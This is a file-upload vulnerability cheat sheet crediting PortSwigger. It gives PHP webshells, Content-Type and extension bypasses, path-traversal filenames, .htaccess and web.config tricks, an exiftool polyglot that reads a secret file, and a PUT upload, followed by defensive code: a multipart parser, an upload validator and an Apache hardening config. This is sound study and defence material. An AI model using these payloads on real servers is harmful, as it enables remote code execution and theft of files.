PHP webshell examples
<?php echo file_get_contents('/path/to/target/file'); ?>
<?php echo system($_GET['command']); ?>
Consider this example multipart upload request:
POST /images HTTP/1.1
Host: normal-website.com
Content-Length: 12345
Content-Type: multipart/form-data; boundary=---------------------------012345678901234567890123456
---------------------------012345678901234567890123456
Content-Disposition: form-data; name="image"; filename="example.jpg"
Content-Type: image/jpeg
[...binary content of example.jpg...]
---------------------------012345678901234567890123456
Content-Disposition: form-data; name="description"
This is an interesting description of my image.
---------------------------012345678901234567890123456
Content-Disposition: form-data; name="username"
wiener
---------------------------012345678901234567890123456--
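To see what the server actually receives from a request like the one above, here is a minimal multipart/form-data parser. It is an added example, not code from the original page or from PortSwigger; the sample body is constructed to mirror the request, with a placeholder string standing in for the JPEG bytes. The point it makes is that the part name, the filename and the per-part Content-Type are all header values typed by the client, so none of them is evidence of what the file is.

```python
import re

# Constructed sample body modelled on the request above. The boundary is the
# one from the Content-Type header; the "binary content" is a placeholder.
BOUNDARY = "---------------------------012345678901234567890123456"
SAMPLE_BODY = "\r\n".join([
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="image"; filename="example.jpg"',
    "Content-Type: image/jpeg",
    "",
    "[...binary content of example.jpg...]",
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="description"',
    "",
    "This is an interesting description of my image.",
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="username"',
    "",
    "wiener",
    "--" + BOUNDARY + "--",
    "",
]).encode()


def _param(header: str, key: str):
    """Extract a quoted parameter (name="..." or filename="...") from a
    Content-Disposition value. Returns None when the parameter is absent."""
    m = re.search(r";\s*" + re.escape(key) + r'="([^"]*)"', header)
    return m.group(1) if m else None


def parse_multipart(body: bytes, boundary: str) -> list:
    """Split a multipart/form-data body into parts. Each part is a dict holding
    the client-supplied name, filename and Content-Type plus the raw data."""
    delimiter = b"--" + boundary.encode()
    parts = []
    # split() yields the preamble (empty here) first and the closing
    # "--\r\n" epilogue last; both are skipped.
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):
            break                                  # closing delimiter
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]                      # CRLF after the delimiter
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]                       # CRLF before the next delimiter
        headers = {}
        for line in head.split(b"\r\n"):
            key, sep, value = line.partition(b":")
            if sep:
                headers[key.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
        disposition = headers.get("content-disposition", "")
        parts.append({
            "name": _param(disposition, "name"),
            "filename": _param(disposition, "filename"),
            "content_type": headers.get("content-type"),
            "data": data,
        })
    return parts


def describe(parts: list) -> list:
    """One log line per part: what the client claimed, and how much it sent."""
    return [
        f'{p["name"]}: filename={p["filename"]!r} type={p["content_type"]!r} {len(p["data"])} bytes'
        for p in parts
    ]


if __name__ == "__main__":
    for line in describe(parse_multipart(SAMPLE_BODY, BOUNDARY)):
        print(line)
```

Frameworks do this parsing for you, but the values they hand back are exactly these: whatever the client wrote. Every check in the sections that follow has to be applied to those values on the server.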
Content-Type restriction bypass
Upload a PHP file, intercept the request and change the part's Content-Type header to an image MIME type (for example image/jpeg).
Abusing the filename for path traversal
It may be possible to use path traversal sequences in the filename:
Content-Disposition: form-data; name="avatar"; filename="../exploit.php"
Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php"
etc
Insufficient blacklisting
Sometimes the blacklist does not cover every executable extension:
.php4, .php5
.shtml
etc
When PHP execution is not enabled for a folder, uploading a .htaccess file into that folder may enable it:
LoadModule php_module /usr/lib/apache2/modules/libphp.so
AddType application/x-httpd-php .php
This enables execution of PHP files when running Apache. When .php is filtered, you can use any other extension and map that extension to PHP in the uploaded .htaccess instead:
LoadModule php_module /usr/lib/apache2/modules/libphp.so
AddType application/x-httpd-php .l33t
Or, in the case of IIS, upload a web.config file:
<staticContent>
<mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent>
Obfuscating file extensions
exploit.php.jpg
exploit.php.
exploit%2Ephp
exploit.asp;.jpg
exploit.asp%00.jpg
\xC0\x2E, \xC4\xAE or \xC0\xAE may be translated to \x2E (a dot) if the filename is parsed as a UTF-8 string
exploit.p.phphp
etc
Flawed validation of file content
Example: create a polyglot (a file inside a file) with exiftool:
exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php
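The server-side checks that close each of the bypasses listed above (Content-Type tampering, traversal in the filename, blacklist gaps, uploaded .htaccess or web.config, obfuscated extensions, and image polyglots), written as one validation routine. This is an added example and not code from the original page or from PortSwigger; Python is used as a language-neutral reference implementation, and the allowlist, the sample bytes and all function names are assumptions. The filenames it is exercised against are the ones from the lists above.

```python
import re
import secrets

# Allowlist: extension -> (expected Content-Type, leading magic bytes).
# Only image types are accepted; nothing the server could execute is listed.
ALLOWED = {
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    "gif": ("image/gif", b"GIF8"),
}

# A PHP open tag anywhere inside an otherwise valid image marks a polyglot.
SCRIPT_MARKER = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


class RejectedUpload(ValueError):
    """Raised with a short reason whenever a check fails."""


def check_filename(raw: bytes) -> str:
    """Validate the client-supplied filename and return its extension.

    Works on the raw bytes on purpose: decoding first is what lets overlong
    UTF-8 sequences such as \\xC0\\xAE turn into '.' after the check has run.
    """
    if any(b < 0x20 or b > 0x7E for b in raw):
        raise RejectedUpload("non-printable or non-ASCII byte in filename")
    name = raw.decode("ascii")
    # No separators, no percent-encoding, no IIS-style ';' tricks. The name is
    # rejected rather than decoded, so "..%2f" never gets a second look.
    if any(c in name for c in "/\\%;"):
        raise RejectedUpload("path or separator character in filename")
    # Exactly one stem and one extension: rules out exploit.php.jpg,
    # exploit.php. (trailing dot), .htaccess and exploit.p.phphp.
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", name)
    if not m:
        raise RejectedUpload("filename must be <stem>.<ext>")
    ext = m.group(1).lower()
    if ext not in ALLOWED:
        raise RejectedUpload(f"extension .{ext} is not on the allowlist")
    return ext


def validate_upload(raw_filename: bytes, declared_type: str, data: bytes) -> str:
    """Run every check; return the accepted extension or raise RejectedUpload."""
    ext = check_filename(raw_filename)
    expected_type, magic = ALLOWED[ext]
    # The Content-Type header is a claim made by the client. It must agree
    # with the extension, but agreement proves nothing by itself.
    if declared_type.split(";")[0].strip().lower() != expected_type:
        raise RejectedUpload("declared Content-Type does not match extension")
    if not data.startswith(magic):
        raise RejectedUpload(f"content does not start with the .{ext} signature")
    if SCRIPT_MARKER.search(data):
        raise RejectedUpload("PHP open tag embedded in image data (polyglot)")
    return ext


def storage_name(ext: str) -> str:
    """Server-chosen name: random stem, validated extension, no client input."""
    return f"{secrets.token_hex(16)}.{ext}"


def verdict(raw_filename: bytes, declared_type: str, data: bytes) -> tuple:
    """(accepted, detail) so callers and tests can inspect the outcome."""
    try:
        return True, validate_upload(raw_filename, declared_type, data)
    except RejectedUpload as exc:
        return False, str(exc)


# Constructed sample contents (not real files).
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 12
POLYGLOT_JPEG = b"\xff\xd8\xff\xe1" + b"Exif\x00\x00" + b"<?php echo 'x'; ?>"
PHP_TEXT = b"<?php echo 'hello'; ?>"

# Filenames from the bypass lists above, each sent with an image-looking
# Content-Type so that only the filename checks decide.
REJECTED_NAMES = [
    b"exploit.php", b"../exploit.php", b"..%2fexploit.php", b"exploit.php.jpg",
    b"exploit.php.", b"exploit%2Ephp", b"exploit.asp;.jpg", b"exploit.asp\x00.jpg",
    b"exploit\xc0\xaephp", b".htaccess", b"web.config", b"exploit.p.phphp",
]

if __name__ == "__main__":
    print(verdict(b"example.jpg", "image/jpeg", FAKE_JPEG))
    print(verdict(b"polyglot.jpg", "image/jpeg", POLYGLOT_JPEG))
    for name in REJECTED_NAMES:
        print(name, verdict(name, "image/jpeg", PHP_TEXT))
```

Two design points: the client's filename is only ever used to derive an extension, never as the stored name, which removes the traversal and obfuscation cases in one go; and the pattern check for a PHP open tag is a cheap detection for the exiftool polyglot, not a guarantee. The stronger fix for polyglots is to re-encode the image with an image library so that metadata such as the EXIF comment is dropped, and to store uploads outside the web root so that nothing in that directory is ever executed.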
Malicious client-side scripts:
When you can upload HTML or SVG files,
Or exploit vulnerabilities in parsers, like XXE in docx, xlsx or XML files.
Upload using PUT
PUT /images/exploit.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-httpd-php
Content-Length: 49
<?php echo file_get_contents('/path/to/file'); ?>
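An Apache configuration for the directory that stores uploads, covering the .htaccess, .shtml and PUT cases from the sections above. This is an added example, not configuration from the original page or from PortSwigger; the directory path is an assumption, and the php_admin_flag line only applies when PHP runs as mod_php.

```apache
# Added example: hardening for a directory that holds user uploads.
# The path is an assumption; adjust it to the real upload location.
<Directory "/var/www/html/uploads">
    # Ignore any uploaded .htaccess, so AddType/AddHandler lines in it have no effect.
    AllowOverride None

    # No server-side includes (.shtml) and no CGI from this tree.
    Options -Includes -ExecCGI

    # mod_php only: switch the PHP engine off for this directory.
    # With PHP-FPM this line does nothing; rely on the FilesMatch block below.
    php_admin_flag engine off

    # Never serve anything with a PHP-like or SSI extension, whatever
    # handler happens to be mapped to it elsewhere in the configuration.
    <FilesMatch "\.(php[0-9]?|phtml|phar|shtml)$">
        Require all denied
    </FilesMatch>

    # Read-only: PUT, DELETE and every method other than GET/HEAD is refused here.
    <LimitExcept GET HEAD>
        Require all denied
    </LimitExcept>
</Directory>
```

Storing uploads outside the document root and serving them through a script that sets the Content-Type from the server-side allowlist removes the need for most of this, but the directory rules above are worth keeping as a second layer for the case where the application-level checks fail.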
Ref: PortSwigger